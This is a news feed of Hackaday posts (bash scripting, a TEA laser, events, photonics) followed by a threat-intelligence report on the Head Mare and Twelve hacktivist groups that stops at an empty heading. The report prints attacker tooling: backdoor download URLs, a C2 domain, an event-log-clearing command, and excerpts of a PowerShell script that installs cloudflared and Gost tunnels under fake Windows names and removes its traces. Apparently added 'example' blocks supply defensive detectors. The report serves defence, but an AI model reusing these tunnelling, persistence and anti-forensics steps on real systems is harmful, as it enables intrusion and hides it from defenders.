hackaday.com/2025/03/13/britcs…


Have Li-ion Batteries Gone Too Far?


The proliferation of affordable lithium batteries has made modern life convenient in a way we could only imagine in the 80s when everything was powered by squadrons of AAs, or has it? [Ian Bogost] ponders whether sticking a lithium in every new device is really the best idea.

There’s no doubt that, for some applications, lithium-based chemistries are a critically enabling technology. NiMH-based EVs of the 1990s suffered short range and slow recharge times which made them only useful as commuter cars, but is a flashlight really better with lithium than with a replaceable cell? When household electronics are treated as disposable, and Right to Repair is only a glimmer in the eye of some legislators, a worn-out cell in a rarely-used device might destine it to the trash bin, especially for the less technically inclined.

[Bogost] decries “the misconception that rechargeables are always better,” although we wonder why his article completely fails to mention the existence of rechargeable NiMH AAs and AAAs which are loads better than their forebears in the 90s. Perhaps even more relevantly, standardized pouch and cylindrical lithium cells are available like the venerable 18650 which we know many makers prefer due to their easy-to-obtain nature. Regardless, we can certainly agree with the author that easy to source and replace batteries are few and far between in many consumer electronics these days. Perhaps new EU regulations will help?

Once you’ve selected a battery for your project, don’t forget to manage it if it’s a Li-ion cell. With great power density, comes great responsibility.


hackaday.com/2025/03/13/have-l…


Got Junk? Then Build This Scrappy TEA Laser


A piece of glass, some bits of tinfoil, a sheet of plastic, a couple of razor blades, and a few assorted bits and bobs are all it takes to build this TEA nitrogen laser. Oh, and a 5,000-volt flyback supply with enough amperage to stop your heart. You’ll need that too.

Seriously, if you choose to follow [MultiverseCurator]’s example and build this laser, you’ll want to take the proper precautions. A transversely excited atmospheric laser is simple in concept, but there are plenty of ways for them to go wrong. Unlike the gas lasers used in laser cutters, there’s no enclosed resonator cavity or mirrors. Rather, the excitation takes place across a narrow gap between two electrodes, using atmospheric nitrogen as the lasing medium. This results in hard UV emissions, which means you can’t see them with the naked eye. Add to that the spark gap creating extremely loud discharges as the laser operates, and hazards abound. Proceed with caution.

Construction starts with a flat glass plate and a pair of large capacitors made from aluminum foil plates separated by a plastic dielectric. The razor blades are connected across the capacitors, separated by a narrow gap, with an inductor made from magnet wire in parallel. A spark gap made from nuts and bolts goes in series, and the whole assembly gets connected to a high-voltage power supply — [Multiverse] used a ZVS driver and a CRT flyback transformer with an eight-megohm resistor in series. The video below has all the build details.

It’ll take a little fiddling to get it lasing, and you’ll need something phosphorescent to see the UV light — a scrap of copy paper should do. But the results are pretty amazing for something made from scrap. If you want to take the design to the next level, you’ll want to check out [Les Wright]’s TEA laser build.

youtube.com/embed/uLyVpYIYT1E?…


hackaday.com/2025/03/13/got-ju…


Linux Fu: Use the Source (Command), Luke


You can argue if bash is a good programming language or not, but you can’t argue that it is a programming language. However, there are a few oddities about it that make it different from most other languages you probably know. For one thing, variables are dynamically scoped. Second, you can easily change variables in an upper scope. This leads to a problem when you want to do something like reset your path:
#!/bin/bash
#: This does NOT work
PATH=/usr/bin:/bin

Well, actually, it does work; it just doesn’t work the way you imagine it might. The key is to realize that when you execute our script (say, resetpath), a new copy of bash runs. It inherits all the variables from your shell. Now the script sets PATH for the new copy of bash. Anything else you run in that script will see your change. But when the script exits, the new copy of bash is gone and the old copy sees the same old PATH it always did.

Sometimes, this is a benefit, similar to “call by value” in other languages. However, what if you want to influence things? What’s more, the situation is just the opposite within bash functions. For example:
#!/bin/bash

b() {
echo "B: $x"
x=200
}

a() {
x=100
b
echo "A: $x"
}

a
#: output
#: B: 100
#: A: 200

Function b has no difficulty reading and even setting variable x.

The Answer, Of Source Course


The answer to the first problem is to use the source command (which can be either the word source or a single period). This tells bash to avoid running a new interpreter and just pretend you’d entered all the lines in a file from the console.

This is great sometimes. Our resetpath script will actually work just fine with either of these commands:
source resetpath
. resetpath

You don’t even need the #! line, although it doesn’t hurt. However, there are a few problems.

The Catches


First, if you exit, then you exit the entire shell, not something you probably meant to do. Second, you wind up polluting the variable space of the parent. For example, if your script creates a function X, with a regular shell script, that function goes away as soon as your script stops. With a source script, function X now will live forever unless you do something about it.

Neither of these problems is insurmountable, of course, and you’ll see a few ways to address them in the example code in this post.

A Simple Example


If you spend a lot of time on the command line, you might want to have shortcut names for directories. What’s more, you might want to execute a little script when you go to particular directories or even when you leave them.

My plan is to keep a simple file in ~/.proj_dirs. To keep things simple, I’m assuming you can figure out the bash format:
PROJ_DIRS["docs"]="~/library/documents"
PROJ_DIRS["video"]="~/library/videos"
PROJ_DIRS["arduino"]="/home/alw/projects/embedded/Arduino"
. . .
The eventual goal is to replace the cd command (or, at least, allow for that). However, it would be a pain to have to write something like “source pcd arduino” every time.

The Alias Solution


The answer is pretty simple. You can create a script that can install itself as an alias. Here’s the basic flow:
#!/bin/bash
#: This is not a bash shell script
#: But needs to be sourced. However...
#: Try:
#: eval $(__project_dir.sh --__install project_dir)
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd"
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
#: Your source script goes here
...

The idea is that if you run it as a regular script with --__install, it returns the alias command. You can then eval that in, for example, a startup script (like .bashrc or .profile), and then you’ll have the alias you want. By default, the code uses pcd, although you can set up any name you like on the command line. You could even create an alias for cd if you wanted to do that.

Why Not Automatic?


You could, of course, detect if you were running normally or as a source automatically. Turns out this is somewhat finicky across shells, although if you are sure you are always using real bash, it is feasible. For example:
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
echo I am not sourced!
fi

Variables


Once you have the basic framework, it is easy to write the scripts to read the “database” (also using source) and do the actual work. However, there is a slight problem. Once you produce all the variables you need to do the work, it leaves all that pollution in your shell’s namespace.

Of course, you could write a function to clean up everything you use, but that’s a pain and error prone, too. A better idea is to write your code in a bash function. Then you can use local variables that will go away when the function returns. That leaves you with just your function to clear up with unset.

That leads to this simple framework:
#!/bin/bash
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd" # default alias name
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
echo "You must source this script"
exit 1
fi

#: Ok your script goes here

main() {
. . .

}

#: Be sure to have this at the end
#: Actually named with underscores in the real code
#: But that upsets the rendering in browser
#: Actual code at gist.github.com/wd5gnr/c5681f2…
go() {
local tmprv
main "$@"
tmprv=$?
unset -f main go   # -f removes the functions; a comma here would try to unset a variable named "main,"
return $tmprv
}

go "$@"
return $?
The very bottom calls the go function, which calls your main function. Then the go function destroys your main function and itself. If you create new functions that you don’t want to keep around, you’ll need to destroy them yourself. Besides, you might be creating functions you want to keep, so the framework can’t decide.

The Whole Thing


You can find the entire example on GitHub. Outside of the management of the alias and the variable scope, the script is unremarkable. Note the optional scripts in the directories (.dir_enter and .dir_exit) are sourced also, so they only need to be readable (-r) not executable (-x).

The only other nuance is that if you enter anything as a directory that the program doesn’t recognize, it assumes it is an actual directory, so you can use this to replace the cd command entirely if you want.

Since the script can tell if it is sourced or not, it is possible to start in the source mode and then call yourself as a normal script to do work where that makes more sense. As usual with bash, there are lots of possibilities.
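As an added example (not the article’s gist code), here is the same pcd design with the two “source” hazards the article describes kept in check: the ~/.proj_dirs database, in the PROJ_DIRS["name"]="path" format shown above, is read with read rather than sourced, so a booby-trapped line can never execute in your shell, and the .dir_enter/.dir_exit hooks are sourced only when they are plain files owned by you. The pcd_* function names are mine, and the code stays POSIX so it also runs under dash.

```bash
#!/bin/bash
# Added example: a pcd-style helper built around the article's design.
# Everything lives in functions with local variables, so sourcing this file
# once from .bashrc leaves only the three pcd_* functions in your namespace.

# pcd_lookup NAME DBFILE: print the path recorded for NAME, or return 1.
# The database is parsed, never sourced: PROJ_DIRS["x"]="$(rm -rf ~)" stays
# an inert string and is simply rejected because it is not a path.
pcd_lookup() {
    local name="$1" dbfile="$2" key value
    [ -r "$dbfile" ] || return 1
    while IFS='=' read -r key value; do
        # accept only PROJ_DIRS["name"]="path" lines; skip comments and junk
        case "$key" in
            'PROJ_DIRS["'*'"]') key="${key#PROJ_DIRS?\"}"; key="${key%\"]}" ;;
            *) continue ;;
        esac
        value="${value#\"}"; value="${value%\"}"
        case "$value" in
            '~/'*) value="$HOME/${value#??}" ;;   # expand a leading tilde ourselves
            /*)    ;;                             # absolute path: fine as-is
            *)     continue ;;                    # relative paths, "$(...)" etc. rejected
        esac
        if [ "$key" = "$name" ]; then
            printf '%s\n' "$value"
            return 0
        fi
    done < "$dbfile"
    return 1
}

# pcd_run_hook DIR HOOK: source DIR/HOOK (.dir_enter or .dir_exit) if present.
# A hook is code run in *your* shell, so refuse symlinks and files you do not
# own: a shared, writable directory must not be able to plant one.
pcd_run_hook() {
    local f="$1/$2"
    [ -e "$f" ] || return 0           # no hook: nothing to do
    if [ -h "$f" ] || [ ! -f "$f" ] || [ ! -O "$f" ]; then
        printf 'pcd: refusing to source %s (symlink or not owned by you)\n' "$f" >&2
        return 1
    fi
    . "$f"
}

# pcd_cd NAME [DBFILE]: the cd replacement.  As in the article, an unknown
# NAME is treated as a literal directory, so "pcd_cd /etc" still works.
pcd_cd() {
    local name="$1" dbfile="${2:-$HOME/.proj_dirs}" target
    if ! target=$(pcd_lookup "$name" "$dbfile"); then
        target="$name"
    fi
    if [ ! -d "$target" ]; then
        printf 'pcd: no such directory: %s\n' "$target" >&2
        return 1
    fi
    pcd_run_hook "$PWD" .dir_exit || return 1
    cd -- "$target" || return 1
    pcd_run_hook "$PWD" .dir_enter
}
```

To wire it in, source the file from .bashrc and add pcd() { pcd_cd "$@"; }; no per-call source and no main/go cleanup is needed because nothing but the functions survives.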

We talk about bash programming a lot around here. Debugging can be helpful, although they haven’t packaged the debugger for newer versions of bash lately.


hackaday.com/2025/03/13/linux-…


Hacking a Rotary Phone


[Yaymukund] made an interesting observation. Old-style rotary phones were made to last and made for service. Why? Because you didn’t own them, the phone company did. There was no advantage for them for you to need a service call or a new phone. Of course, many of these old phones are still hanging around like the GPO 746 that appears in the post.

What do you do with an old rotary phone? In this case, you make it play a random tune whenever someone picks up the handset. As you might expect, you don’t need much of the original phone to do this. In particular, you need the handset receiver and the switch hook. We’d have liked to read the dial to select a tune, but perhaps that could be in version two.

All the components wire back to a D92732 circuit board. Finding the right wires was a bit finicky, but eventually, a Teensy, a battery pack, and an audio breakout board were in place. The rest is mostly trivial.

[Yaymukund] spent about £300, but over half of that was on tools most Hackaday readers will already have. The phone itself was £65. You can use these phones as a basis for many projects. Even if you want to go mobile.


hackaday.com/2025/03/13/hackin…


Hackaday Europe 2025: Speaker Schedule and Official Event Page


Hackaday Europe 2025 is just days away, and we’ve got the finalized speaker schedule hot off the digital press. We’re also pleased to announce that the event page is now officially live, where you can find all the vital information about the weekend’s festivities in one place.

Whether you’ll be joining the fun in Berlin, or watching the live stream from home, we’ve got a fantastic lineup of speakers this year who are eager to tell us all about the projects that have been keeping them up at night recently:

Saturday Schedule


9:00 – 10:00   Registration and Breakfast
10:00 – 10:20  Opening Remarks
10:30 – 11:20  What if the Future [of Electronics] was Compostable? (Keynote, David Cuartielles)
11:30 – 11:50  Manufacturing the Hackaday Supercon Badge (Giovanni Salinas)
12:00 – 12:20  Seeing Through Silicon with IRIS (InfraRed, in-situ) Imaging (Bunnie Huang)
12:30 – 13:30  Lunch
13:30 – 13:50  Developing a NFC Based Decentralized Payment System (Daniel Büchele & Andre Zibell)
14:00 – 14:40  Hacking a Pinball Machine (Daniel Dakhno)
14:50 – 15:30  Hardware Startup / Product Pitfalls (Sera Evcimen)
15:40 – 16:00  Creating Light Sculptures for Fun and…Mostly for Fun (Erik Bosman)
16:10 – 16:50  The Core64 – NeonPixels – 65uino Collaboration (Geppert, Freyermuth, & Nielsen)
17:00 – 17:20  Make PCBs Bend Over Backwards for You: How to Design Flexible PCBs (Rehana Al-Soltane)
17:30 – 18:10  More Than Motors: Decoding the Software Behind Pen Plotters and CNC Devices (Francis Stokes)
18:20 – 18:40  Half-size Hacking – 0.05in Matrix Boards Under the Microscope (Alun Morris)
18:40 – 20:00  Dinner
20:00 – 20:40  HEU1993 to WHY2025: Dutch Hacker Camps from the Past and the Future (Christel Sanders)
20:50 – 21:30  Vectors, Pixels, Plotters and Public Participation (Niklas Roy)
21:30 – 22:00  Live Performance (Rich Hogben & Aleksandar Bradic)
22:00 – 24:00  Badge Hacking Ceremony

Time Has Run Out!


Tickets sold out a few days ago, so if you’ve got one we’ll see you soon, and if not, we will be streaming all of the Saturday talks live, so hit up Hackaday on the weekend and you can play along, at least virtually. And for back-channel chat, join us on the Hackaday Discord #europe-2025 channel.


hackaday.com/2025/03/13/hackad…


100 Days with a Mechanical Heart! Is the Future of Transplants Already Here?


Australian company BiVACOR has reached an important milestone in its development work: a patient lived for more than 100 days with the mechanical heart the company created, after which he successfully received a donor organ transplant. The name of the man, who needed a transplant because of a serious illness, has not been disclosed.

The system, called the Total Artificial Heart (TAH), is an innovative blood circulation mechanism. The design is based on an electromechanical pump with a single moving part, a rotor, which is held in the desired position by magnetic levitation. The device’s main advantage is its ability to direct blood flow to both the body and the lungs at the same time.

The engineers radically changed the traditional approach to the problem. Earlier models contained many moving parts that gradually wore out as they rubbed against each other. In the new model, the rotor, shaped something like a special impeller, literally floats without touching any other part.

The company has even released an animated 3D model of the mechanism that clearly demonstrates how it works. You can watch it here.

The implant is powered by an external power system. The controller and batteries are connected to the device via a transcutaneous cable, a special wire that passes through a small incision in the patient’s body.

Last year, BiVACOR conducted its first study in the United States, on five patients who received the TAH as a temporary measure while awaiting a donor heart. All participants underwent surgery successfully and were discharged from hospital after some time. The outcome is known for two of them: one received a donor heart 27 days after the TAH was implanted, the other eight days later.

The operation on the Australian patient lasted six hours. After recovery, the doctors allowed the man to leave the clinic. For more than three months he led a normal life with the implant, until the opportunity for a transplant arose.

Heart disease remains an extremely acute problem, and the number of donor organs available for transplant is catastrophically small. BiVACOR’s specialists intend to improve their invention so that it can work for up to ten years, roughly the same period as a real transplanted heart.

However, doctors warn that, despite the encouraging results, the development is still in the clinical trial phase. In the United States, only 15 more TAH procedures have been approved. Years of research will be needed before the technology is approved for widespread use, whether as temporary support for patients on waiting lists or as a permanent measure.

The article “100 Days with a Mechanical Heart! Is the Future of Transplants Already Here?” originally appeared on il blog della sicurezza informatica.


High-Speed Reservoir Computing With Integrated Laser Graded Artificial Neurons


So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
General reservoir computing with laser graded neuron. (Credit: Yikun Nie et al., 2024, Optica)
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.

The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.

Several of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). With the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.


hackaday.com/2025/03/13/high-s…


Head Mare and Twelve join forces to attack Russian entities



Introduction


In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.

The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.

This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.

Technical details

Head Mare’s toolkit


The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.

  • mimikatz;
  • ADRecon;
  • secretsdump;
  • ProcDump;
  • Localtonet;
  • revsocks;
  • ngrok;
  • cloudflared;
  • Gost;
  • fscan;
  • SoftPerfect Network Scanner;
  • mRemoteNG;
  • PSExec;
  • smbexec;
  • wmiexec;
  • LockBit 3.0;
  • Babuk.

Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.

Notable new tools


Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.

In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.

Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.

Initial Access


While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).

The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.

The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.

Persistence


The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.

They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.

Anti-detection techniques


Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:

Software                          Path in the system
Cloud storage sync tool rclone    C:\ProgramData\wusa.exe
PhantomJitter                     C:\Windows\System32\inetsrv\calc.exe
cloudflared                       C:\Windows\System32\winuac.exe
Gost                              C:\Windows\System32\winsw.exe

In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.

Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.
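As an added example (not part of the report), two checks that turn the artifacts above into detections: a genuine Windows binary name (wusa.exe, calc.exe, cmd.exe) found outside System32/SysWOW64, and history lines that clear event logs or remove services. The expected-directory table, the sample paths and the history excerpt are constructed here from the values in the report; names invented by the attackers, such as winuac.exe and winsw.exe, cannot be caught by name alone and would need an allowlist or signature check.

```bash
#!/bin/bash
# Added example, not from the report.  Findings go to stderr in scan_sample;
# the hit count goes to stdout.  POSIX sh, so it also runs under dash.

# masquerade_check PATH: print a finding and return 0 when PATH carries the
# name of a system binary the report saw abused but sits outside the two
# directories where Windows keeps it.  Return 1 otherwise.
masquerade_check() {
    local lower dir base
    # normalise: lowercase, and backslash -> slash so patterns need no escaping
    lower=$(printf '%s' "$1" | tr 'A-Z\\' 'a-z/')
    dir="${lower%/*}"
    base="${lower##*/}"
    case "$base" in
        wusa.exe|calc.exe|cmd.exe) ;;      # names seen in the masquerading table
        *) return 1 ;;
    esac
    case "$dir" in
        c:/windows/system32|c:/windows/syswow64) return 1 ;;   # expected home
    esac
    printf 'MASQUERADE %s outside its system directory: %s\n' "$base" "$1"
}

# history_check LINE: classify one PowerShell/cmd history line.  Prints
# LOG_CLEAR or SERVICE_REMOVAL and returns 0 on a hit; returns 1 otherwise.
# stop-service alone is routine administration and is deliberately not flagged.
history_check() {
    local lower
    lower=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$lower" in
        *clear-eventlog*)                 printf 'LOG_CLEAR: %s\n' "$1" ;;
        *remove-service*|*'sc delete '*)  printf 'SERVICE_REMOVAL: %s\n' "$1" ;;
        *) return 1 ;;
    esac
}

# scan_sample: run both checks over constructed input; print the hit count.
scan_sample() {
    local hits=0 line
    # constructed process image paths, taken from the masquerading table above
    for line in 'C:\ProgramData\wusa.exe' \
                'C:\Windows\System32\inetsrv\calc.exe' \
                'C:\Windows\System32\winuac.exe' \
                'C:\Windows\System32\calc.exe'; do
        if masquerade_check "$line" >&2; then hits=$((hits + 1)); fi
    done
    # constructed ConsoleHost_history.txt excerpt modelled on the report
    while IFS= read -r line; do
        if history_check "$line" >&2; then hits=$((hits + 1)); fi
    done <<'EOF'
Get-ChildItem C:\ProgramData
stop-service -name winsws
remove-service -name "winsws"
sc delete winsws
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
EOF
    echo "$hits"
}
```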

Command and Control


After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.

In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.

Pivoting


The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.

Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.

Cloudflared tunnels traffic through the Cloudflare network. It opens an outbound connection from the victim host to Cloudflare's edge, and a tunnel registered in the attacker's Cloudflare account forwards traffic over that connection, so the tunnel acts as a proxy for C2 communication. Because the connection is initiated from inside the network, it bypasses NAT (Network Address Translation) and inbound firewall rules that would otherwise block direct connections from attacker servers to the victim host.

The proxy.ps1 script can also download archives from URLs specified on the command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token

Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "

Port number updated to $port in $winswxmlPath"

# Service install
Write-Host "

Installing gost as service"
Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.

If the -t parameter is passed to the script, it installs and configures cloudflared on the system.
function Setup-Cloudflared-Service {

# Service install
Write-Host "

Installing cloudflared as service"
Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.

In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "

Uninstalling gost"
Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

Write-Host "

Uninstalling cloudflared"
Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "

Deleted: $filePath"
} else {
Write-Output " File not found: $filePath"
}
}
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.

In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.
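The service registrations described in this section (a winsw wrapper whose XML names the real program, cloudflared registered with a tunnel token, Localtonet wrapped by NSSM, all with Microsoft-sounding display names) leave a recognisable shape in service-installation telemetry. The following triage is an added example and not code from the report: it runs over constructed records shaped like an analyst's join of System event 7045 (service installed) with the installing process command line from event 4688; the field names, the sample events and the tiny baseline of Microsoft service binaries are assumptions of the example. The "eyJ" prefix check relies on cloudflared tunnel tokens being base64-encoded JSON.

```python
"""Triage of service-installation records for tunnelling tools (added example)."""
import re
from pathlib import PureWindowsPath

# Constructed baseline; real deployments use a signed-file inventory instead.
MICROSOFT_SERVICE_BINARIES = {"svchost.exe", "spoolsv.exe", "lsass.exe", "services.exe", "msiexec.exe"}

CMDLINE_RULES = [
    (re.compile(r"\bnssm(?:\.exe)?\s+install\b", re.I), "nssm wrapper install"),
    # cloudflared "service install <token>": tokens are base64 JSON, hence the eyJ prefix
    (re.compile(r"\bservice\s+install\s+eyJ[A-Za-z0-9+/=_-]+", re.I), "cloudflared tunnel token"),
    (re.compile(r"\blocaltonet(?:\.exe)?\s+authtoken\b", re.I), "localtonet authtoken"),
]


def _service_exe(image_path):
    """First token of a service ImagePath, honouring a quoted path that contains spaces."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ")[0]


def triage(event, present_files):
    """event: dict with service_name, display_name, image_path, install_cmdline.
    present_files: set of lower-cased paths known to exist on the host.
    Returns a list of finding tags (empty when nothing fired)."""
    tags = []
    exe = PureWindowsPath(_service_exe(event["image_path"]))

    # winsw-style wrapper: a <name>.xml beside the service binary names the real program.
    sidecar = str(exe.with_suffix(".xml")).lower()
    if sidecar in present_files:
        tags.append("winsw-style wrapper, real program is named in " + sidecar)

    for rx, tag in CMDLINE_RULES:
        if rx.search(event.get("install_cmdline", "")):
            tags.append(tag)

    # Microsoft-branded display name on a binary that is not a Microsoft service executable.
    if "microsoft" in event.get("display_name", "").lower() and exe.name.lower() not in MICROSOFT_SERVICE_BINARIES:
        tags.append("microsoft-branded display name on non-Microsoft binary")
    return tags


# Constructed sample events modelled on the names and paths in the report.
PRESENT_FILES = {
    r"c:\windows\system32\winsws.exe", r"c:\windows\system32\winsws.xml",
    r"c:\windows\system32\winsw.exe", r"c:\windows\system32\winuac.exe",
}
SAMPLE_EVENTS = [
    {"service_name": "winsw", "display_name": "Microsoft Windows Update",
     "image_path": r"C:\Windows\System32\winsws.exe",
     "install_cmdline": r"C:\Windows\System32\winsws.exe install"},
    {"service_name": "winuac", "display_name": "Microsoft UAC Service Wrapper",
     "image_path": r'"C:\Windows\System32\winuac.exe" tunnel run',
     "install_cmdline": r"C:\Windows\System32\winuac.exe service install eyJhIjoiYWJjIiwidCI6InRlc3QifQ=="},
    {"service_name": "Win32_Serv", "display_name": "Win32_Serv",
     "image_path": r"C:\Users\alice\AppData\Local\Temp\nssm.exe",
     "install_cmdline": r"nssm.exe install Win32_Serv"},
    {"service_name": "Spooler", "display_name": "Print Spooler",          # benign control
     "image_path": r"C:\Windows\System32\spoolsv.exe", "install_cmdline": ""},
]


def run_sample():
    """Map each sample service name to its finding tags."""
    return {e["service_name"]: triage(e, PRESENT_FILES) for e in SAMPLE_EVENTS}


if __name__ == "__main__":
    for name, tags in run_sample().items():
        print(name, tags)
```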

Reconnaissance


